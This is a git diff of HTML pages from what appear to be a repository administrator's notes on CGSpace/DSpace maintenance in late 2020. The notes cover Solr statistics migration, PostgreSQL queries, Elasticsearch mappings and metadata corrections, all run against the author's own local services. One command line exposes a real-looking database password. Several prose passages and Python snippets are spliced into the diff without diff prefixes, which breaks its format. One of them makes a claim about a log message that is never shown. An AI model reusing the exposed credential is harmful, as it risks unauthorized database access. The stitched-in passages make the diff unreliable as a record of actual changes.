          @@ -897,8 +897,8 @@ $ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri $ git checkout origin/6_x-dev-atmire-modules $ chrt -b 0 mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false clean package $ sudo su - postgres -$ psql dspacetest -c 'CREATE EXTENSION pgcrypto;' -$ psql dspacetest -c "DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');" +$ psql dspacetest -c 'CREATE EXTENSION pgcrypto;' +$ psql dspacetest -c "DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');" $ exit $ sudo systemctl stop tomcat7 $ cd dspace/target/dspace-installer @@ -911,7 +911,7 @@ $ sudo systemctl start tomcat7
      • Then I started processing the Solr stats one core and 1 million records at a time:
      -
      $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
      +
      $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
       $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
       $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
       $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
      @@ -920,8 +920,8 @@ $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
       
      • After the fifth or so run I got this error:
      -
      Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
      -org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
      +
      Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
      +org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
               at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
               at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
               at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
      @@ -945,7 +945,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error whil
       
    -
    $ curl -s "http://localhost:8083/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</query></delete>"
    +
    $ curl -s "http://localhost:8083/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</query></delete>"
     
    • Then I restarted the solr-upgrade-statistics-6x process, which apparently had no records left to process
    • I started processing the statistics-2019 core… @@ -967,8 +967,8 @@ java.lang.OutOfMemoryError: Java heap space
    -
    $ curl -s "http://localhost:8083/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>id:/.+-unmigrated/</query></delete>"
    -
      +
      $ curl -s "http://localhost:8083/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>id:/.+-unmigrated/</query></delete>"
      +
      • I restarted the process and it crashed again a few minutes later
        • I increased the memory to 4096m and tried again
        • @@ -976,7 +976,7 @@ java.lang.OutOfMemoryError: Java heap space
      -
      $ curl -s "http://localhost:8083/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</query></delete>"
      +
      $ curl -s "http://localhost:8083/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</query></delete>"
       
      • Then I started processing the statistics-2017 core…
          @@ -984,7 +984,7 @@ java.lang.OutOfMemoryError: Java heap space
      -
      $ curl -s "http://localhost:8083/solr/statistics-2017/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</query></delete>"
      +
      $ curl -s "http://localhost:8083/solr/statistics-2017/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</query></delete>"
       
      • Also I purged 2.7 million unmigrated records from the statistics-2019 core
      • I filed an issue with Atmire about the duplicate values in the owningComm and containerCommunity fields in Solr: https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=839
      • @@ -1011,7 +1011,7 @@ java.lang.OutOfMemoryError: Java heap space
      $ dspace metadata-export -f /tmp/cgspace.csv
      -$ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri[en_US]' /tmp/cgspace.csv > /tmp/cgspace-subjects.csv
      +$ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri[en_US]' /tmp/cgspace.csv > /tmp/cgspace-subjects.csv
       
      • I sanity checked the CSV in csv-metadata-quality after exporting from OpenRefine, then applied the changes to 453 items on CGSpace
      • Skype with Peter and Abenet about CGSpace Explorer (AReS) @@ -1043,7 +1043,7 @@ $ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri
        $ ./create-mappings.py > /tmp/elasticsearch-mappings.txt
         $ ./convert-mapping.py >> /tmp/elasticsearch-mappings.txt
         $ curl -XDELETE http://localhost:9200/openrxv-values
        -$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H "Content-Type: application/json" --data-binary @/tmp/elasticsearch-mappings.txt
        +$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H "Content-Type: application/json" --data-binary @/tmp/elasticsearch-mappings.txt
         
        • After that I had to manually create and delete a fake mapping in the AReS UI so that the mappings would show up
        • I fixed a few strings in the OpenRXV admin dashboard and then re-built the frontend container:
        • @@ -1088,16 +1088,16 @@ South Asia,Southern Asia Africa South Of Sahara,Sub-Saharan Africa North Africa,Northern Africa West Asia,Western Asia -$ ./fix-metadata-values.py -i 2020-10-28-update-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -t 'correct' -m 227 -d +$ ./fix-metadata-values.py -i 2020-10-28-update-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -t 'correct' -m 227 -d
      • Then I started a full Discovery re-indexing:
      -
      $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
      -
      -real    92m14.294s
      -user    7m59.840s
      -sys     2m22.327s
      -
        +
        $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
        +
        +real    92m14.294s
        +user    7m59.840s
        +sys     2m22.327s
        +
        • I realized I had been using an incorrect Solr query to purge unmigrated items after processing with solr-upgrade-statistics-6x
          • Instead of this: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
          • @@ -1115,17 +1115,17 @@ sys 2m22.327s
          • Send Peter a list of affiliations, authors, journals, publishers, investors, and series for correction:
          -
          dspace=> \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-affiliations.csv WITH CSV HEADER;
          +
          dspace=> \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-affiliations.csv WITH CSV HEADER;
           COPY 6357
          -dspace=> \COPY (SELECT DISTINCT text_value as "dc.description.sponsorship", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-sponsors.csv WITH CSV HEADER;
          +dspace=> \COPY (SELECT DISTINCT text_value as "dc.description.sponsorship", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-sponsors.csv WITH CSV HEADER;
           COPY 730
          -dspace=> \COPY (SELECT DISTINCT text_value as "dc.contributor.author", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-authors.csv WITH CSV HEADER;
          +dspace=> \COPY (SELECT DISTINCT text_value as "dc.contributor.author", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-authors.csv WITH CSV HEADER;
           COPY 71748
          -dspace=> \COPY (SELECT DISTINCT text_value as "dc.publisher", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 39 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-publishers.csv WITH CSV HEADER;
          +dspace=> \COPY (SELECT DISTINCT text_value as "dc.publisher", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 39 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-publishers.csv WITH CSV HEADER;
           COPY 3882
          -dspace=> \COPY (SELECT DISTINCT text_value as "dc.source", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 55 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-journal-titles.csv WITH CSV HEADER;
          +dspace=> \COPY (SELECT DISTINCT text_value as "dc.source", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 55 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-journal-titles.csv WITH CSV HEADER;
           COPY 3684
          -dspace=> \COPY (SELECT DISTINCT text_value as "dc.relation.ispartofseries", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 43 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-series.csv WITH CSV HEADER;
          +dspace=> \COPY (SELECT DISTINCT text_value as "dc.relation.ispartofseries", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 43 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-series.csv WITH CSV HEADER;
           COPY 5598
           
          • I noticed there are still some mappings for acronyms and other fixes that haven’t been applied, so I ran my create-mappings.py script against Elasticsearch again @@ -1134,12 +1134,12 @@ COPY 5598
        -
        $ grep -c '"find"' /tmp/elasticsearch-mappings*
        +
        $ grep -c '"find"' /tmp/elasticsearch-mappings*
         /tmp/elasticsearch-mappings2.txt:350
         /tmp/elasticsearch-mappings.txt:1228
        -$ cat /tmp/elasticsearch-mappings* | grep -v '{"index":{}}' | wc -l
        +$ cat /tmp/elasticsearch-mappings* | grep -v '{"index":{}}' | wc -l
         1578
        -$ cat /tmp/elasticsearch-mappings* | grep -v '{"index":{}}' | sort | uniq | wc -l
        +$ cat /tmp/elasticsearch-mappings* | grep -v '{"index":{}}' | sort | uniq | wc -l
         1578
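The same duplicate check can be sketched in Python, which is handy if the counts need to be reused in a script. The `count_mappings` helper is a hypothetical name; like `grep -v`, it drops any line containing the action marker and then compares the total with the number of distinct lines.

```python
ACTION = '{"index":{}}'


def count_mappings(lines):
    """Return (total, unique) counts of mapping lines, ignoring action lines."""
    docs = [line.rstrip("\n") for line in lines if ACTION not in line]
    return len(docs), len(set(docs))


if __name__ == "__main__":
    sample = [
        '{"index":{}}\n',
        '{"find": "FISH", "replace": "Fish"}\n',
        '{"index":{}}\n',
        '{"find": "FISH", "replace": "Fish"}\n',
    ]
    total, unique = count_mappings(sample)
    print(total, unique)
```

If both numbers are equal, as with the 1578 above, no mapping appears in more than one file.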
         
        • I have no idea why they wouldn’t have been caught yesterday when I originally ran the script on a clean AReS with no mappings… @@ -1148,10 +1148,10 @@ $ cat /tmp/elasticsearch-mappings* | grep -v '{"index":{}}' | sort | u
      -
      $ cat /tmp/elasticsearch-mappings* > /tmp/new-elasticsearch-mappings.txt
      -$ curl -XDELETE http://localhost:9200/openrxv-values
      -$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H "Content-Type: application/json" --data-binary @/tmp/new-elasticsearch-mappings.txt
      -
        +
        $ cat /tmp/elasticsearch-mappings* > /tmp/new-elasticsearch-mappings.txt
        +$ curl -XDELETE http://localhost:9200/openrxv-values
        +$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H "Content-Type: application/json" --data-binary @/tmp/new-elasticsearch-mappings.txt
        +
        • The latest indexing (second for today!) finally finished on AReS and the countries and affiliations/crps/journals all look MUCH better
          • There are still a few acronyms present, some of which are in the value mappings and some which aren’t
          • @@ -1160,7 +1160,7 @@ $ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H dspace=# BEGIN; -dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ '[[:upper:]]'; +dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ '[[:upper:]]'; UPDATE 123 dspace=# COMMIT;
        @@ -1198,10 +1198,10 @@ $ dspace community-filiator --set --parent 10568/83389 --child 10568/56924
    • Then I did a test to apply the corrections and deletions on my local DSpace:
    -
    $ ./fix-metadata-values.py -i 2020-10-30-fix-854-journals.csv -db dspace -u dspace -p 'fuuu' -f dc.source -t 'correct' -m 55
    -$ ./delete-metadata-values.py -i 2020-10-30-delete-90-journals.csv -db dspace -u dspace -p 'fuuu' -f dc.source -m 55
    -$ ./fix-metadata-values.py -i 2020-10-30-fix-386-publishers.csv -db dspace -u dspace -p 'fuuu' -f dc.publisher -t correct -m 39
    -$ ./delete-metadata-values.py -i 2020-10-30-delete-10-publishers.csv -db dspace -u dspace -p 'fuuu' -f dc.publisher -m 39
    +
    $ ./fix-metadata-values.py -i 2020-10-30-fix-854-journals.csv -db dspace -u dspace -p 'fuuu' -f dc.source -t 'correct' -m 55
    +$ ./delete-metadata-values.py -i 2020-10-30-delete-90-journals.csv -db dspace -u dspace -p 'fuuu' -f dc.source -m 55
    +$ ./fix-metadata-values.py -i 2020-10-30-fix-386-publishers.csv -db dspace -u dspace -p 'fuuu' -f dc.publisher -t correct -m 39
    +$ ./delete-metadata-values.py -i 2020-10-30-delete-10-publishers.csv -db dspace -u dspace -p 'fuuu' -f dc.publisher -m 39
     
    • I will wait to apply them on CGSpace when I have all the other corrections from Peter processed
    @@ -1214,8 +1214,8 @@ $ ./delete-metadata-values.py -i 2020-10-30-delete-10-publishers.csv -db dspace
  • Quickly process the sponsor corrections Peter sent me a few days ago and test them locally:
  • -
    $ ./fix-metadata-values.py -i 2020-10-31-fix-82-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t 'correct' -m 29
    -$ ./delete-metadata-values.py -i 2020-10-31-delete-74-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29
    +
    $ ./fix-metadata-values.py -i 2020-10-31-fix-82-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t 'correct' -m 29
    +$ ./delete-metadata-values.py -i 2020-10-31-delete-74-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29
     
    • I applied all the fixes from today and yesterday on CGSpace and then started a full Discovery re-index:
    diff --git a/docs/2020-11/index.html b/docs/2020-11/index.html index 8a02769d6..7f205eba1 100644 --- a/docs/2020-11/index.html +++ b/docs/2020-11/index.html @@ -32,7 +32,7 @@ So far we’ve spent at least fifty hours to process the statistics and stat "/> - + @@ -150,8 +150,8 @@ So far we’ve spent at least fifty hours to process the statistics and stat -
    $ ./fix-metadata-values.py -i 2020-11-05-fix-862-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t 'correct' -m 211
    -$ ./delete-metadata-values.py -i 2020-11-05-delete-29-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
    +
    $ ./fix-metadata-values.py -i 2020-11-05-fix-862-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t 'correct' -m 211
    +$ ./delete-metadata-values.py -i 2020-11-05-delete-29-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
     
    • Then I started a Discovery re-index on CGSpace:
    @@ -191,7 +191,7 @@ sys 2m26.931s
  • Since I was going to restart CGSpace and update the Discovery indexes anyways I decided to check for any straggling upper case AGROVOC entries and lower case them:
  • dspace=# BEGIN;
    -dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ '[[:upper:]]';
    +dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ '[[:upper:]]';
     UPDATE 164
     dspace=# COMMIT;
     
      @@ -314,8 +314,8 @@ $ git checkout origin/6_x-dev-atmire-modules $ npm install -g yarn $ chrt -b 0 mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false -P \!dspace-lni,\!dspace-rdf,\!dspace-sword,\!dspace-swordv2,\!dspace-jspui clean package $ sudo su - postgres -$ psql dspace -c 'CREATE EXTENSION pgcrypto;' -$ psql dspace -c "DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');" +$ psql dspace -c 'CREATE EXTENSION pgcrypto;' +$ psql dspace -c "DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');" $ exit $ rm -rf /home/cgspace/config/spring $ ant update @@ -338,7 +338,7 @@ $ sudo systemctl start tomcat7 # pg_upgradecluster 9.6 main # pg_dropcluster 9.6 main # systemctl start postgresql -# dpkg -l | grep postgresql | grep 9.6 | awk '{print $2}' | xargs dpkg -r +# dpkg -l | grep postgresql | grep 9.6 | awk '{print $2}' | xargs dpkg -r
    • Then I ran all system updates and rebooted the server…
    • After the server came back up I re-ran the Ansible playbook to make sure all configs and services were updated
    • @@ -372,13 +372,13 @@ Error sending email:
    • I copied the mail.extraproperties = mail.smtp.starttls.enable=true setting from the old DSpace 5 dspace.cfg and now the emails are working
    • After the Discovery indexing finished I started processing the Solr stats one core and 2.5 million records at a time:
    -
    $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
    +
    $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
     $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics
     
    • After about 6,000,000 records I got the same error that I’ve gotten every time I test this migration process:
    -
    Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
    -org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
    +
    Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
    +org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
             at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
             at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
             at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
    @@ -407,7 +407,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error whil
     
    • There are almost 1,500 locks:
    -
    $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
    +
    $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
     1494
     
    • I sent a mail to the dspace-tech mailing list to ask for help…
    @@ -454,8 +454,8 @@ java.lang.OutOfMemoryError: Java heap space
    -
    Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
    -org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
    +
    Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
    +org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
             at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
             at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
             at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
    @@ -486,7 +486,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error whil
     
    • There are over 2,000 locks:
    -
    $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
    +
    $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
     2071
     

    2020-11-18

      @@ -603,7 +603,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error whil
    -
    dspace=# \COPY (SELECT item_id,uuid FROM item WHERE in_archive='t' AND withdrawn='f' AND item_id IS NOT NULL) TO /tmp/2020-11-22-item-id2uuid.csv WITH CSV HEADER;
    +
    dspace=# \COPY (SELECT item_id,uuid FROM item WHERE in_archive='t' AND withdrawn='f' AND item_id IS NOT NULL) TO /tmp/2020-11-22-item-id2uuid.csv WITH CSV HEADER;
     COPY 87411
     
    • Saving some notes I wrote down about faceting by community and collection in Solr, for potential use in the future in the DSpace Statistics API
    • @@ -688,11 +688,11 @@ COPY 87411
    -
    $ xml sel -t -m '//value-pairs[@value-pairs-name="ilrisubject"]/pair/displayed-value/text()' -c '.' -n dspace/config/input-forms.xml
    +
    $ xml sel -t -m '//value-pairs[@value-pairs-name="ilrisubject"]/pair/displayed-value/text()' -c '.' -n dspace/config/input-forms.xml
     
    • IWMI sent me a few new ORCID identifiers so I combined them with our existing ones as well as another ILRI one that Tezira asked me to update, filtered the unique ones, and then resolved their names using my resolve-orcids.py script:
    -
    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/iwmi-orcids.txt /tmp/hung.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2020-11-30-combined-orcids.txt
    +
    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/iwmi-orcids.txt /tmp/hung.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2020-11-30-combined-orcids.txt
     $ ./resolve-orcids.py -i /tmp/2020-11-30-combined-orcids.txt -o /tmp/2020-11-30-combined-orcids-names.txt -d
     # sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
     $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
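The `grep -oE … | sort | uniq` step above can also be sketched in Python. This is only an illustration of the same pattern matching and de-duplication, not the `resolve-orcids.py` script itself; the function name `extract_unique_orcids` is hypothetical.

```python
import re

# Same pattern as the grep -oE call in the notes: four groups of four
# uppercase letters or digits, separated by hyphens.
ORCID_PATTERN = re.compile(r"[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}")


def extract_unique_orcids(texts):
    """Return the sorted, de-duplicated identifiers found in the given strings."""
    found = set()
    for text in texts:
        # findall returns every non-overlapping match, like grep -o
        found.update(ORCID_PATTERN.findall(text))
    return sorted(found)
```

Passing the contents of each input file as one string should give the same set of identifiers as the shell pipeline, though the sort order may differ from `sort` depending on the locale.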
    @@ -701,15 +701,15 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
     
     
    $ cat 2020-11-30-fix-hung-orcid.csv
     cg.creator.id,correct
    -"Hung Nguyen-Viet: 0000-0001-9877-0596","Hung Nguyen-Viet: 0000-0003-1549-2733"
    -"Adriana Tofiño: 0000-0001-7115-7169","Adriana Tofiño Rivera: 0000-0001-7115-7169"
    -"Cristhian Puerta Rodriguez: 0000-0001-5992-1697","David Puerta: 0000-0001-5992-1697"
    -"Ermias Betemariam: 0000-0002-1955-6995","Ermias Aynekulu: 0000-0002-1955-6995"
    -"Hirut Betaw: 0000-0002-1205-3711","Betaw Hirut: 0000-0002-1205-3711"
    -"Megan Zandstra: 0000-0002-3326-6492","Megan McNeil Zandstra: 0000-0002-3326-6492"
    -"Tolu Eyinla: 0000-0003-1442-4392","Toluwalope Emmanuel: 0000-0003-1442-4392"
    -"VInay Nangia: 0000-0001-5148-8614","Vinay Nangia: 0000-0001-5148-8614"
    -$ ./fix-metadata-values.py -i 2020-11-30-fix-hung-orcid.csv -db dspace63 -u dspacetest -p 'dom@in34sniper' -f cg.creator.id -t 'correct' -m 240
    +"Hung Nguyen-Viet: 0000-0001-9877-0596","Hung Nguyen-Viet: 0000-0003-1549-2733"
    +"Adriana Tofiño: 0000-0001-7115-7169","Adriana Tofiño Rivera: 0000-0001-7115-7169"
    +"Cristhian Puerta Rodriguez: 0000-0001-5992-1697","David Puerta: 0000-0001-5992-1697"
    +"Ermias Betemariam: 0000-0002-1955-6995","Ermias Aynekulu: 0000-0002-1955-6995"
    +"Hirut Betaw: 0000-0002-1205-3711","Betaw Hirut: 0000-0002-1205-3711"
    +"Megan Zandstra: 0000-0002-3326-6492","Megan McNeil Zandstra: 0000-0002-3326-6492"
    +"Tolu Eyinla: 0000-0003-1442-4392","Toluwalope Emmanuel: 0000-0003-1442-4392"
    +"VInay Nangia: 0000-0001-5148-8614","Vinay Nangia: 0000-0001-5148-8614"
    +$ ./fix-metadata-values.py -i 2020-11-30-fix-hung-orcid.csv -db dspace63 -u dspacetest -p 'dom@in34sniper' -f cg.creator.id -t 'correct' -m 240
     
    diff --git a/docs/2020-12/index.html b/docs/2020-12/index.html
    index 1f197d3a3..e0d11a6a3 100644
    --- a/docs/2020-12/index.html
    +++ b/docs/2020-12/index.html
    @@ -36,7 +36,7 @@ I started processing those (about 411,000 records):
     "/>
    -
    +
    @@ -132,8 +132,8 @@ I started processing those (about 411,000 records):
    -
    $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2015
    -
      +
      $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2015
      +
      • AReS went down when the renew-letsencrypt service stopped the angular_nginx container in the pre-update hook and failed to bring it back up
        • I ran all system updates on the host and rebooted it and AReS came back up OK
        • @@ -153,7 +153,7 @@ I started processing those (about 411,000 records):
        $ ./run.sh -s http://localhost:8081/solr/statistics-2010 -a export -o statistics-2010.json -k uid
         $ ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2010.json -k uid
        -$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:*</query></delete>"
        +$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:*</query></delete>"
         
        • I deployed Tomcat 7.0.107 on DSpace Test (CGSpace is still Tomcat 7.0.104)
        • I finished migrating all the statistics from the yearly shards back to the main core
        • @@ -179,21 +179,21 @@ $ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=tru
          • First the 2010 core:
          -
          $ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics-2010 -a export -o statistics-2010.json -k uid
          -$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2010.json -k uid
          -$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:*</query></delete>"
          -
            +
            $ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics-2010 -a export -o statistics-2010.json -k uid
            +$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2010.json -k uid
            +$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:*</query></delete>"
            +
            • Judging by the DSpace logs all these cores had a problem starting up in the last month:
            -
            # grep -rsI "Unable to create core" [dspace]/log/dspace.log.2020-* | grep -o -E "statistics-[0-9]+" | sort | uniq -c
            -     24 statistics-2010
            -     24 statistics-2015
            -     18 statistics-2016
            -      6 statistics-2018
            -
              +
              # grep -rsI "Unable to create core" [dspace]/log/dspace.log.2020-* | grep -o -E "statistics-[0-9]+" | sort | uniq -c
              +     24 statistics-2010
              +     24 statistics-2015
              +     18 statistics-2016
              +      6 statistics-2018
              +
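As a rough Python equivalent of the `grep … | grep -o -E … | sort | uniq -c` pipeline above, the following sketch tallies core names from log lines. The function name `count_core_failures` is hypothetical, and reading the log files is left out.

```python
import re
from collections import Counter

# Same pattern as the grep -o -E call in the notes
CORE_PATTERN = re.compile(r"statistics-[0-9]+")


def count_core_failures(log_lines):
    """Tally core names on lines that mention a failed core creation."""
    counts = Counter()
    for line in log_lines:
        if "Unable to create core" not in line:
            continue
        # grep -o prints every match on a line, so count each occurrence
        counts.update(CORE_PATTERN.findall(line))
    return counts
```

Because `grep -o` prints every match, a single log line that names the core several times is counted several times. If each failure is logged on one line like the message quoted in these notes, which names the core three times, the totals would be three per logged error.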
              • The message is always this:
              -
